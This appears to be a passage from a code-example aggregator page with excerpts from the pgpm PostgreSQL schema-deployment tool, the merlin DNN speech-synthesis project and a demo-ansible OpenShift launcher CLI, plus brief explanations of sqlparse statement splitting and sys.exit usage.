            self._conn = psycopg2.connect(self._connection_string, connection_factory=pgpm.lib.utils.db.MegaConnection)
        cur = self._conn.cursor()

        # be cautious, dangerous thing
        if auto_commit:
            self._conn.autocommit = True

        # Check if DB is pgpm enabled
        if not pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(cur, self._pgpm_schema_name):
            self._logger.error('Can\'t deploy schemas to DB where pgpm was not installed. '
                               'First install pgpm by running pgpm install')
            self._conn.close()
            sys.exit(1)

        # check installed version of _pgpm schema.
        pgpm_v_db_tuple = pgpm.lib.utils.db.SqlScriptsHelper.get_pgpm_db_version(cur, self._pgpm_schema_name)
        pgpm_v_db = distutils.version.StrictVersion(".".join(pgpm_v_db_tuple))
        pgpm_v_script = distutils.version.StrictVersion(pgpm.lib.version.__version__)
        if pgpm_v_script > pgpm_v_db:
            self._logger.error('{0} schema version is outdated. Please run pgpm install --upgrade first.'
                               .format(self._pgpm_schema_name))
            self._conn.close()
            sys.exit(1)
        elif pgpm_v_script < pgpm_v_db:
            self._logger.error('Deployment script\'s version is lower than the version of {0} schema '
                               'installed in DB. Update pgpm script first.'.format(self._pgpm_schema_name))
            self._conn.close()
            sys.exit(1)

        # Resolve dependencies
        list_of_deps_ids = []
        if self._config.dependencies:
            _is_deps_resolved, list_of_deps_ids, _list_of_unresolved_deps = \
                self._resolve_dependencies(cur, self._config.dependencies)
            if not _is_deps_resolved:
                self._logger.error('There are unresolved dependencies. Deploy the following package(s) and try again:')
                for unresolved_pkg in _list_of_unresolved_deps:
                    self._logger.error('{0}'.format(unresolved_pkg))
                self._conn.close()
                sys.exit(1)

        # Prepare and execute preamble
        _deployment_script_preamble = pkgutil.get_data('pgpm', 'lib/db_scripts/deploy_prepare_config.sql')
        self._logger.debug('Executing a preamble to deployment statement')
        cur.execute(_deployment_script_preamble)

        # Get schema name from project configuration
        schema_name = ''
        if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
            if self._config.subclass == 'versioned':
                schema_name = '{0}_{1}'.format(self._config.name, self._config.version.raw)

                self._logger.debug('Schema {0} will be updated'.format(schema_name))
            elif self._config.subclass == 'basic':
                schema_name = '{0}'.format(self._config.name)
                if not files_deployment:
                    self._logger.debug('Schema {0} will be created/replaced'.format(schema_name))
                else:
                    self._logger.debug('Schema {0} will be updated'.format(schema_name))

        # Create schema or update it if exists (if not in production mode) and set search path
        if files_deployment:  # if specific scripts to be deployed
            if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
                if not pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(cur, schema_name):
                    self._logger.error('Can\'t deploy scripts to schema {0}. Schema doesn\'t exist in database'
                                       .format(schema_name))
                    self._conn.close()
                    sys.exit(1)
                else:
                    pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, schema_name)
                    self._logger.debug('Search_path was changed to schema {0}'.format(schema_name))
        else:
            if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
                if not pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(cur, schema_name):
                    pgpm.lib.utils.db.SqlScriptsHelper.create_db_schema(cur, schema_name)
                elif mode == 'safe':
                    self._logger.error('Schema already exists. It won\'t be overridden in safe mode. '
                                       'Rerun your script with "-m moderate", "-m overwrite" or "-m unsafe" flags')
                    self._conn.close()
                    sys.exit(1)
                elif mode == 'moderate':
                    old_schema_exists = True
                    old_schema_rev = 0
                    while old_schema_exists:
                        old_schema_exists = pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(
                            cur, schema_name + '_' + str(old_schema_rev))
                        if old_schema_exists:
                            old_schema_rev += 1
                    old_schema_name = schema_name + '_' + str(old_schema_rev)
                    self._logger.debug('Schema already exists. It will be renamed to {0} in moderate mode. Renaming...'
                                       .format(old_schema_name))
                    _rename_schema_script = "ALTER SCHEMA {0} RENAME TO {1};\n".format(schema_name, old_schema_name)
                    cur.execute(_rename_schema_script)
                    # Add metadata to pgpm schema
                    pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
                    cur.callproc('_set_revision_package'.format(self._pgpm_schema_name),
                                 [self._config.name,
                                  self._config.subclass,
                                  old_schema_rev,
                                  self._config.version.major,
                                  self._config.version.minor,
                                  self._config.version.patch,
                                  self._config.version.pre])
                    self._logger.debug('Schema {0} was renamed to {1}. Meta info was added to {2} schema'
                                       .format(schema_name, old_schema_name, self._pgpm_schema_name))
                    pgpm.lib.utils.db.SqlScriptsHelper.create_db_schema(cur, schema_name)
                elif mode == 'unsafe':
                    _drop_schema_script = "DROP SCHEMA {0} CASCADE;\n".format(schema_name)
                    cur.execute(_drop_schema_script)
                    self._logger.debug('Dropping old schema {0}'.format(schema_name))
                    pgpm.lib.utils.db.SqlScriptsHelper.create_db_schema(cur, schema_name)

        if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
            pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, schema_name)

        # Reordering and executing types
        return_value['type_scripts_deployed'] = []
        if len(type_scripts_dict) > 0:
            types_script = '\n'.join([''.join(value) for key, value in type_scripts_dict.items()])
            type_drop_scripts, type_ordered_scripts, type_unordered_scripts = self._reorder_types(types_script)
            if type_drop_scripts:
                for statement in type_drop_scripts:
                    if statement:
                        cur.execute(statement)
            if type_ordered_scripts:
                for statement in type_ordered_scripts:
                    if statement:
                        cur.execute(statement)
            if type_unordered_scripts:
                for statement in type_unordered_scripts:
                    if statement:
                        cur.execute(statement)
            self._logger.debug('Types loaded to schema {0}'.format(schema_name))
            return_value['type_scripts_deployed'] = [key for key in type_scripts_dict]
        else:
            self._logger.debug('No type scripts to deploy')

        # Executing Table DDL scripts
        executed_table_scripts = []
        return_value['table_scripts_deployed'] = []
        if len(table_scripts_dict) > 0:
            if compare_table_scripts_as_int:
                sorted_table_scripts_dict = collections.OrderedDict(sorted(table_scripts_dict.items(),
                                                                           key=lambda t: int(t[0].rsplit('.', 1)[0])))
            else:
                sorted_table_scripts_dict = collections.OrderedDict(sorted(table_scripts_dict.items(),
                                                                           key=lambda t: t[0].rsplit('.', 1)[0]))

            self._logger.debug('Running Table DDL scripts')
            for key, value in sorted_table_scripts_dict.items():
                pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
                cur.callproc('_is_table_ddl_executed'.format(self._pgpm_schema_name), [
                    key,
                    self._config.name,
                    self._config.subclass,
                    self._config.version.major,
                    self._config.version.minor,
                    self._config.version.patch,
                    self._config.version.pre
                ])
                is_table_executed = cur.fetchone()[0]
                if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
                    pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, schema_name)
                elif self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.DATABASE_SCOPE:
                    cur.execute("SET search_path TO DEFAULT ;")
                if (not is_table_executed) or (mode == 'unsafe'):
                    # in auto-commit mode every statement is executed separately;
                    # auto commit is normally used for non-transactional statements,
                    # where splitting avoids "cannot be executed from a function or multi-command string" errors
                    if auto_commit:
                        for statement in sqlparse.split(value):
                            if statement:
                                cur.execute(statement)
                    else:
                        cur.execute(value)
                    self._logger.debug(value)
                    self._logger.debug('{0} executed for schema {1}'.format(key, schema_name))
                    executed_table_scripts.append(key)
                    return_value['table_scripts_deployed'].append(key)
                else:
                    self._logger.debug('{0} is not executed for schema {1} as it has already been executed before. '
                                       .format(key, schema_name))
        else:
            self._logger.debug('No Table DDL scripts to execute')

        # Executing functions
        return_value['function_scripts_deployed'] = []
        if len(function_scripts_dict) > 0:
            self._logger.debug('Running functions definitions scripts')
            for key, value in function_scripts_dict.items():
                # in auto-commit mode every statement is executed separately;
                # auto commit is normally used for non-transactional statements,
                # where splitting avoids "cannot be executed from a function or multi-command string" errors
                if auto_commit:
                    for statement in sqlparse.split(value):
                        if statement:
                            cur.execute(statement)
                else:
                    cur.execute(value)
                return_value['function_scripts_deployed'].append(key)
            self._logger.debug('Functions loaded to schema {0}'.format(schema_name))
        else:
            self._logger.debug('No function scripts to deploy')

        # Executing views
        return_value['view_scripts_deployed'] = []
        if len(view_scripts_dict) > 0:
            self._logger.debug('Running views definitions scripts')
            for key, value in view_scripts_dict.items():
                # in auto-commit mode every statement is executed separately;
                # auto commit is normally used for non-transactional statements,
                # where splitting avoids "cannot be executed from a function or multi-command string" errors
                if auto_commit:
                    for statement in sqlparse.split(value):
                        if statement:
                            cur.execute(statement)
                else:
                    cur.execute(value)
                return_value['view_scripts_deployed'].append(key)
            self._logger.debug('Views loaded to schema {0}'.format(schema_name))
        else:
            self._logger.debug('No view scripts to deploy')

        # Executing triggers
        return_value['trigger_scripts_deployed'] = []
        if len(trigger_scripts_dict) > 0:
            self._logger.debug('Running trigger definitions scripts')
            for key, value in trigger_scripts_dict.items():
                # in auto-commit mode every statement is executed separately;
                # auto commit is normally used for non-transactional statements,
                # where splitting avoids "cannot be executed from a function or multi-command string" errors
                if auto_commit:
                    for statement in sqlparse.split(value):
                        if statement:
                            cur.execute(statement)
                else:
                    cur.execute(value)
                return_value['trigger_scripts_deployed'].append(key)
            self._logger.debug('Triggers loaded to schema {0}'.format(schema_name))
        else:
            self._logger.debug('No trigger scripts to deploy')

        # alter schema privileges if needed
        if (not files_deployment) and mode != 'overwrite' \
                and self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
            pgpm.lib.utils.db.SqlScriptsHelper.revoke_all(cur, schema_name, 'public')
            if self._config.usage_roles:
                pgpm.lib.utils.db.SqlScriptsHelper.grant_usage_privileges(
                    cur, schema_name, ', '.join(self._config.usage_roles))
                self._logger.debug('User(s) {0} was (were) granted usage permissions on schema {1}.'
                                   .format(", ".join(self._config.usage_roles), schema_name))
            if self._config.owner_role:
                pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
                cur.callproc('_alter_schema_owner', [schema_name, self._config.owner_role])
                self._logger.debug('Ownership of schema {0} and all its objects was changed and granted to user {1}.'
                                   .format(schema_name, self._config.owner_role))

        # Add metadata to pgpm schema
        pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
        cur.callproc('_upsert_package_info'.format(self._pgpm_schema_name),
                     [self._config.name,
                      self._config.subclass,
                      self._config.version.major,
                      self._config.version.minor,
                      self._config.version.patch,
                      self._config.version.pre,
                      self._config.version.metadata,
                      self._config.description,
                      self._config.license,
                      list_of_deps_ids,
                      vcs_ref,
                      vcs_link,
                      issue_ref,
                      issue_link])
        self._logger.debug('Meta info about deployment was added to schema {0}'
                           .format(self._pgpm_schema_name))
        pgpm_package_id = cur.fetchone()[0]
        if len(table_scripts_dict) > 0:
            for key in executed_table_scripts:
                cur.callproc('_log_table_evolution'.format(self._pgpm_schema_name), [key, pgpm_package_id])

        # Commit transaction
        self._conn.commit()

        self._conn.close()

        deployed_files_count = len(return_value['function_scripts_deployed']) + \
                               len(return_value['type_scripts_deployed']) + \
                               len(return_value['view_scripts_deployed']) + \
                               len(return_value['trigger_scripts_deployed']) + \
                               len(return_value['table_scripts_deployed'])

        requested_files_count = len(return_value['function_scripts_requested']) + \
                                len(return_value['type_scripts_requested']) + \
                                len(return_value['view_scripts_requested']) + \
                                len(return_value['trigger_scripts_requested']) + \
                                len(return_value['table_scripts_requested'])

        return_value['deployed_files_count'] = deployed_files_count
        return_value['requested_files_count'] = requested_files_count
        if deployed_files_count == requested_files_count:
            return_value['code'] = self.DEPLOYMENT_OUTPUT_CODE_OK
            return_value['message'] = 'OK'
        else:
            return_value['code'] = self.DEPLOYMENT_OUTPUT_CODE_NOT_ALL_DEPLOYED
            return_value['message'] = 'Not all requested files were deployed'
        return return_value
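
The auto-commit branch above is worth distilling: some statements (the PostgreSQL error quoted in the comments is one case) cannot run as part of a multi-command string, so the script is split with sqlparse and each statement is executed on its own. Below is a minimal, self-contained sketch of that pattern, not the pgpm implementation; it uses the standard-library sqlite3 module instead of a psycopg2 connection purely so it runs anywhere, and the table name t is made up for the demo.

import sqlite3

import sqlparse  # third-party library, the same one used in the example above


def run_script(cur, sql_text, auto_commit):
    """Execute a (possibly multi-statement) SQL string on an open cursor."""
    if auto_commit:
        # Run each statement separately; a single execute() call with a
        # multi-command string would be rejected by the sqlite3 driver.
        for statement in sqlparse.split(sql_text):
            if statement:
                cur.execute(statement)
    else:
        cur.execute(sql_text)


conn = sqlite3.connect(':memory:')
conn.isolation_level = None  # sqlite3's flavour of auto-commit
cur = conn.cursor()
run_script(cur, 'CREATE TABLE t (x INTEGER); INSERT INTO t VALUES (1);', auto_commit=True)
print(cur.execute('SELECT x FROM t').fetchall())  # -> [(1,)]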

Example 30

Project: merlin
Source File: dnn_synth_PROJECTION.py
View license
def main_function(cfg, in_dir, out_dir, token_xpath, index_attrib_name, synth_mode, cmp_dir, projection_end):
    ## TODO: token_xpath & index_attrib_name   should be in config
    
    # get a logger for this main function
    logger = logging.getLogger("main")
    
    # get another logger to handle plotting duties
    plotlogger = logging.getLogger("plotting")

    # later, we might do this via a handler that is created, attached and configured
    # but for now we need to do it manually
    plotlogger.set_plot_path(cfg.plot_dir)
    
    #### parameter setting########
    hidden_layers_sizes = cfg.hyper_params['hidden_layers_sizes']
    
    ####prepare environment    
    synth_utts_input = glob.glob(in_dir + '/*.utt')
    ###synth_utts_input = synth_utts_input[:10]   ### temp!!!!!

    if synth_mode == 'single_sentence_demo':
        synth_utts_input = synth_utts_input[:1]
        print 
        print 'mode: single_sentence_demo'
        print synth_utts_input
        print

    indexed_utt_dir = os.path.join(out_dir, 'utt') ## place to put test utts with tokens labelled with projection indices
    direcs = [out_dir, indexed_utt_dir]
    for direc in direcs:
        if not os.path.isdir(direc):
            os.mkdir(direc)
    

    ## was below -- see comment
    if synth_mode == 'single_sentence_demo':
        synth_utts_input = add_projection_indices_with_replicates(synth_utts_input, token_xpath, index_attrib_name, indexed_utt_dir, 100)
    else:
        add_projection_indices(synth_utts_input, token_xpath, index_attrib_name, indexed_utt_dir)




    file_id_list = []
    for fname in synth_utts_input:
        junk,name = os.path.split(fname)
        file_id_list.append(name.replace('.utt',''))


    data_dir = cfg.data_dir

    model_dir = os.path.join(cfg.work_dir, 'nnets_model')
    gen_dir   = os.path.join(out_dir, 'gen')    

    ###normalisation information
    norm_info_file = os.path.join(data_dir, 'norm_info' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim) + '_' + cfg.output_feature_normalisation + '.dat')
    
    ### normalise input full context label
    if cfg.label_style == 'HTS':
        sys.exit('only ossian utts supported')        
    elif cfg.label_style == 'composed':
        suffix='composed'

    # the number can be removed
    binary_label_dir      = os.path.join(out_dir, 'lab_bin')
    nn_label_norm_dir     = os.path.join(out_dir, 'lab_bin_norm')

    binary_label_file_list   = prepare_file_path_list(file_id_list, binary_label_dir, cfg.lab_ext)
    nn_label_norm_file_list  = prepare_file_path_list(file_id_list, nn_label_norm_dir, cfg.lab_ext)

    ## need this to find normalisation info:
    if cfg.process_labels_in_work_dir:
        label_data_dir = cfg.work_dir
    else:
        label_data_dir = data_dir
    
    min_max_normaliser = None
    label_norm_file = 'label_norm_%s.dat' %(cfg.label_style)
    label_norm_file = os.path.join(label_data_dir, label_norm_file)
    
    if cfg.label_style == 'HTS':
        sys.exit('script not tested with HTS labels')


    ## always do this in synth:
    ## if cfg.NORMLAB and (cfg.label_style == 'composed'):  
    logger.info('add projection indices to tokens in test utts')

    ## add_projection_indices was here

    logger.info('preparing label data (input) using "composed" style labels')
    label_composer = LabelComposer()
    label_composer.load_label_configuration(cfg.label_config_file)

    logger.info('Loaded label configuration')

    lab_dim=label_composer.compute_label_dimension()
    logger.info('label dimension will be %d' % lab_dim)
    
    if cfg.precompile_xpaths:
        label_composer.precompile_xpaths()
    
    # there is now a set of parallel input label files (e.g., one set of HTS labels and another set of Ossian trees)
    # create all the lists of these, ready to pass to the label composer

    in_label_align_file_list = {}
    for label_style, label_style_required in label_composer.label_styles.iteritems():
        if label_style_required:
            logger.info('labels of style %s are required - constructing file paths for them' % label_style)
            if label_style == 'xpath':
                in_label_align_file_list['xpath'] = prepare_file_path_list(file_id_list, indexed_utt_dir, cfg.utt_ext, False)
            elif label_style == 'hts':
                logger.critical('script not tested with HTS labels')        
            else:
                logger.critical('unsupported label style %s specified in label configuration' % label_style)
                raise Exception
    
        # now iterate through the files, one at a time, constructing the labels for them 
        num_files=len(file_id_list)
        logger.info('the label styles required are %s' % label_composer.label_styles)
        
        for i in xrange(num_files):
            logger.info('making input label features for %4d of %4d' % (i+1,num_files))

            # iterate through the required label styles and open each corresponding label file

            # a dictionary of file descriptors, pointing at the required files
            required_labels={}
            
            for label_style, label_style_required in label_composer.label_styles.iteritems():
                
                # the files will be a parallel set of files for a single utterance
                # e.g., the XML tree and an HTS label file
                if label_style_required:
                    required_labels[label_style] = open(in_label_align_file_list[label_style][i] , 'r')
                    logger.debug(' opening label file %s' % in_label_align_file_list[label_style][i])

            logger.debug('label styles with open files: %s' % required_labels)
            label_composer.make_labels(required_labels,out_file_name=binary_label_file_list[i],fill_missing_values=cfg.fill_missing_values,iterate_over_frames=cfg.iterate_over_frames)
                
            # now close all opened files
            for fd in required_labels.itervalues():
                fd.close()
    
    # no silence removal for synthesis ...
    
    ## minmax norm:
    min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99, exclude_columns=[cfg.index_to_project])

    (min_vector, max_vector) = retrieve_normalisation_values(label_norm_file)
    min_max_normaliser.min_vector = min_vector
    min_max_normaliser.max_vector = max_vector

    ### apply the precomputed and stored min-max values to the whole dataset
    min_max_normaliser.normalise_data(binary_label_file_list, nn_label_norm_file_list)


### DEBUG
    if synth_mode == 'inferred':

        ## set up paths -- write CMP data to infer from in outdir:
        nn_cmp_dir = os.path.join(out_dir, 'nn' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
        nn_cmp_norm_dir = os.path.join(out_dir, 'nn_norm'  + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))

        in_file_list_dict = {}
        for feature_name in cfg.in_dir_dict.keys():
            in_direc = os.path.join(cmp_dir, feature_name)
            assert os.path.isdir(in_direc), in_direc
            in_file_list_dict[feature_name] = prepare_file_path_list(file_id_list, in_direc, cfg.file_extension_dict[feature_name], False)        
        
        nn_cmp_file_list         = prepare_file_path_list(file_id_list, nn_cmp_dir, cfg.cmp_ext)
        nn_cmp_norm_file_list    = prepare_file_path_list(file_id_list, nn_cmp_norm_dir, cfg.cmp_ext)



        ### make output acoustic data
        #    if cfg.MAKECMP:
        logger.info('creating acoustic (output) features')
        delta_win = [-0.5, 0.0, 0.5]
        acc_win = [1.0, -2.0, 1.0]
        
        acoustic_worker = AcousticComposition(delta_win = delta_win, acc_win = acc_win)
        acoustic_worker.prepare_nn_data(in_file_list_dict, nn_cmp_file_list, cfg.in_dimension_dict, cfg.out_dimension_dict)

        ## skip silence removal for inference -- need to match labels, which are
        ## not silence removed either


        
    ### retrieve acoustic normalisation information for normalising the features back
    var_dir   = os.path.join(data_dir, 'var')
    var_file_dict = {}
    for feature_name in cfg.out_dimension_dict.keys():
        var_file_dict[feature_name] = os.path.join(var_dir, feature_name + '_' + str(cfg.out_dimension_dict[feature_name]))
        
        
    ### normalise output acoustic data
#    if cfg.NORMCMP:


#### DEBUG
    if synth_mode == 'inferred':


        logger.info('normalising acoustic (output) features using method %s' % cfg.output_feature_normalisation)
        cmp_norm_info = None
        if cfg.output_feature_normalisation == 'MVN':
            normaliser = MeanVarianceNorm(feature_dimension=cfg.cmp_dim)

            (mean_vector,std_vector) = retrieve_normalisation_values(norm_info_file)
            normaliser.mean_vector = mean_vector
            normaliser.std_vector = std_vector

            ### apply the precomputed and stored mean and std to the whole dataset
            normaliser.feature_normalisation(nn_cmp_file_list, nn_cmp_norm_file_list)

        elif cfg.output_feature_normalisation == 'MINMAX':        
            sys.exit('not implemented')
            #            min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim)
            #            global_mean_vector = min_max_normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number])
            #            global_std_vector = min_max_normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector)

            #            min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim, min_value = 0.01, max_value = 0.99)
            #            min_max_normaliser.find_min_max_values(nn_cmp_file_list[0:cfg.train_file_number])
            #            min_max_normaliser.normalise_data(nn_cmp_file_list, nn_cmp_norm_file_list)

            #            cmp_min_vector = min_max_normaliser.min_vector
            #            cmp_max_vector = min_max_normaliser.max_vector
            #            cmp_norm_info = numpy.concatenate((cmp_min_vector, cmp_max_vector), axis=0)

        else:
            logger.critical('Normalisation type %s is not supported!\n' %(cfg.output_feature_normalisation))
            raise
 

    combined_model_arch = str(len(hidden_layers_sizes))
    for hid_size in hidden_layers_sizes:
        combined_model_arch += '_' + str(hid_size)
    nnets_file_name = '%s/%s_%s_%d_%s_%d.%d.train.%d.model' \
                      %(model_dir, cfg.model_type, cfg.combined_feature_name, int(cfg.multistream_switch), 
                        combined_model_arch, lab_dim, cfg.cmp_dim, cfg.train_file_number)

    ### DNN model training
#    if cfg.TRAINDNN: always do this in synth






#### DEBUG
    inferred_weights = None ## default, for non-inferring synth methods
    if synth_mode == 'inferred':

        ## infer control values from TESTING data

        ## Use identical lists (our test data) for 'train' and 'valid' -- this is just to
        ## keep the infer_projections_fn theano function happy, since it operates on the
        ## validation set. The 'train' set shouldn't actually be used here.
        train_x_file_list = copy.copy(nn_label_norm_file_list)
        train_y_file_list = copy.copy(nn_cmp_norm_file_list)
        valid_x_file_list = copy.copy(nn_label_norm_file_list)
        valid_y_file_list = copy.copy(nn_cmp_norm_file_list)

        print 'FILELIST for inference:'
        print train_x_file_list 
        print 

        try:
            inferred_weights = infer_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
                        valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
                        nnets_file_name = nnets_file_name, \
                        n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
                        hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
           
        except KeyboardInterrupt:
            logger.critical('train_DNN interrupted via keyboard')
            # Could 'raise' the exception further, but that causes a deep traceback to be printed
            # which we don't care about for a keyboard interrupt. So, just bail out immediately
            sys.exit(1)
        except:
            logger.critical('train_DNN threw an exception')
            raise






    ## if cfg.DNNGEN:
    logger.info('generating from DNN')

    try:
        os.makedirs(gen_dir)
    except OSError as e:
        if e.errno == errno.EEXIST:
            # not an error - just means directory already exists
            pass
        else:
            logger.critical('Failed to create generation directory %s' % gen_dir)
            logger.critical(' OS error was: %s' % e.strerror)
            raise



    gen_file_list = prepare_file_path_list(file_id_list, gen_dir, cfg.cmp_ext)

    #print nn_label_norm_file_list  ## <-- this WAS mangled in 'inferred' mode because the file list was copied into the train/valid lists and then shuffled; copy.copy is now used to avoid that
    #print gen_file_list

    weights_outfile = os.path.join(out_dir, 'projection_weights_for_synth.txt')  
    dnn_generation_PROJECTION(nn_label_norm_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list, cfg=cfg, synth_mode=synth_mode, projection_end=projection_end, projection_weights_to_use=inferred_weights, save_weights_to_file=weights_outfile )
    
    logger.debug('denormalising generated output using method %s' % cfg.output_feature_normalisation)
    ## DNNGEN

    fid = open(norm_info_file, 'rb')
    cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
    fid.close()
    cmp_min_max = cmp_min_max.reshape((2, -1))
    cmp_min_vector = cmp_min_max[0, ] 
    cmp_max_vector = cmp_min_max[1, ]

    if cfg.output_feature_normalisation == 'MVN':
        denormaliser = MeanVarianceNorm(feature_dimension = cfg.cmp_dim)
        denormaliser.feature_denormalisation(gen_file_list, gen_file_list, cmp_min_vector, cmp_max_vector)
        
    elif cfg.output_feature_normalisation == 'MINMAX':
        denormaliser = MinMaxNormalisation(cfg.cmp_dim, min_value = 0.01, max_value = 0.99, min_vector = cmp_min_vector, max_vector = cmp_max_vector)
        denormaliser.denormalise_data(gen_file_list, gen_file_list)
    else:
        logger.critical('denormalising method %s is not supported!\n' %(cfg.output_feature_normalisation))
        raise

    ## perform MLPG to smooth the parameter trajectories
    ## lf0 is included, so the output features must have vuv.
    generator = ParameterGeneration(gen_wav_features = cfg.gen_wav_features)
    generator.acoustic_decomposition(gen_file_list, cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict, var_file_dict)    

            ## osw: skip MLPG:
#            split_cmp(gen_file_list, ['mgc', 'lf0', 'bap'], cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict)    

    ## Variance scaling:
    scaled_dir = gen_dir + '_scaled'
    simple_scale_variance(gen_dir, scaled_dir, var_file_dict, cfg.out_dimension_dict, file_id_list, gv_weight=0.5)  ## gv_weight hardcoded

    ### generate wav ---- glottHMM only!!!
    #if cfg.GENWAV:
    logger.info('reconstructing waveform(s)')
    generate_wav_glottHMM(scaled_dir, file_id_list)   # generated speech
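
This example aborts with sys.exit('only ossian utts supported') and similar string arguments in several places. Passing a non-integer object to sys.exit prints it to stderr and the interpreter exits with status 1, which makes it a compact way to stop with an error message. A minimal sketch of that behaviour follows; the check_label_style helper is made up for illustration.

import sys


def check_label_style(label_style):
    if label_style != 'composed':
        # A non-integer argument is printed to stderr and the exit status is 1.
        sys.exit('only composed labels supported, got %s' % label_style)


if __name__ == '__main__':
    check_label_style('composed')  # returns silently
    check_label_style('HTS')       # prints the message and exits with status 1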

Example 31

Project: demo-ansible
Source File: run.py
View license
@click.command()

### Cluster options
@click.option('--cluster-id', default='demo', show_default=True,
              help='Cluster identifier (used for prefixing/naming various items created in AWS)')
@click.option('--num-nodes', type=click.INT, default=1, show_default=True,
              help='Number of application nodes')
@click.option('--num-infra', type=click.IntRange(1,3), default=1,
              show_default=True, help='Number of infrastructure nodes')
@click.option('--hexboard-size', type=click.Choice(hexboard_sizes),
              help='Override Hexboard size calculation (tiny=32, xsmall=64, small=108, medium=266, large=512, xlarge=1026)',
              show_default=True)
@click.option('--console-port', default='443', type=click.IntRange(1,65535), help='OpenShift web console port',
              show_default=True)
@click.option('--api-port', default='443', type=click.IntRange(1,65535), help='OpenShift API port',
              show_default=True)
@click.option('--deployment-type', default='openshift-enterprise', help='openshift deployment type',
              show_default=True)
@click.option('--default-password', default='openshift3',
              help='password for all users', show_default=True)

### Smoke test options
@click.option('--run-smoke-tests', is_flag=True, help='Run workshop smoke tests')
@click.option('--num-smoke-test-users', default=5, type=click.INT,
              help='Number of smoke test users', show_default=True)
@click.option('--run-only-smoke-tests', is_flag=True, help='Run only the workshop smoke tests')

### AWS/EC2 options
@click.option('--region', default='us-east-1', help='ec2 region',
              show_default=True)
@click.option('--ami', default='ami-2051294a', help='ec2 ami',
              show_default=True)
@click.option('--master-instance-type', default='m4.large', help='ec2 instance type',
              show_default=True)
@click.option('--infra-instance-type', default='m4.2xlarge', help='ec2 instance type',
              show_default=True)
@click.option('--node-instance-type', default='m4.large', help='ec2 instance type',
              show_default=True)
@click.option('--keypair', default='default', help='ec2 keypair name',
              show_default=True)

### DNS options
@click.option('--r53-zone', help='route53 hosted zone (must be pre-configured)')
@click.option('--app-dns-prefix', default='apps', help='application dns prefix',
              show_default=True)

### Subscription and Software options
@click.option('--package-version', help='OpenShift Package version (eg: 3.2.1.9)',
              show_default=True, default='3.2.1.9')
@click.option('--rhsm-user', help='Red Hat Subscription Management User')
@click.option('--rhsm-pass', help='Red Hat Subscription Management Password',
                hide_input=True,)
@click.option('--skip-subscription-management', is_flag=True,
              help='Skip subscription management steps')
@click.option('--use-certificate-repos', is_flag=True,
              help='Uses certificate-based yum repositories for the AOS content. Requires providing paths to local certificate key and pem files.')
@click.option('--aos-repo', help='An alternate URL to locate software')
@click.option('--prerelease', help='If using prerelease software, set to true',
              show_default=True, default=False, is_flag=True)
@click.option('--kerberos-user', help='Kerberos userid (eg: jsmith) for use with --prerelease')
@click.option('--kerberos-token', help='Token to go with the kerberos user for use with --prerelease')
@click.option('--registry-url', help='A URL for an alternate Docker registry for dockerized components of OpenShift',
              show_default=True, default='registry.access.redhat.com/openshift3/ose-${component}:${version}')

### Miscellaneous options
@click.option('--no-confirm', is_flag=True,
              help='Skip confirmation prompt')
@click.option('--debug-playbook',
              help='Specify a path to a specific playbook to debug with all vars')
@click.option('--cleanup', is_flag=True,
              help='Deletes environment')
@click.help_option('--help', '-h')
@click.option('-v', '--verbose', count=True)

def launch_demo_env(num_nodes,
                    num_infra,
                    hexboard_size=None,
                    region=None,
                    ami=None,
                    no_confirm=False,
                    master_instance_type=None,
                    node_instance_type=None,
                    infra_instance_type=None,
                    keypair=None,
                    r53_zone=None,
                    cluster_id=None,
                    app_dns_prefix=None,
                    deployment_type=None,
                    console_port=443,
                    api_port=443,
                    package_version=None,
                    rhsm_user=None,
                    rhsm_pass=None,
                    skip_subscription_management=False,
                    use_certificate_repos=False,
                    aos_repo=None,
                    prerelease=False,
                    kerberos_user=None,
                    kerberos_token=None,
                    registry_url=None,
                    run_smoke_tests=False,
                    num_smoke_test_users=None,
                    run_only_smoke_tests=False,
                    default_password=None,
                    debug_playbook=None,
                    cleanup=False,
                    verbose=0):

  # Force num_masters = 3 because of issues with API startup, ELB health checks, and more
  num_masters = 3

  # Prompt for the R53 zone if it was not provided:
  if r53_zone is None:
    r53_zone = click.prompt('R53 zone')

  # Cannot run cleanup with no-confirm
  if cleanup and no_confirm:
    click.echo('Cannot use --cleanup and --no-confirm as it is not safe.')
    sys.exit(1)

  # If skipping subscription management, must have cert repos enabled
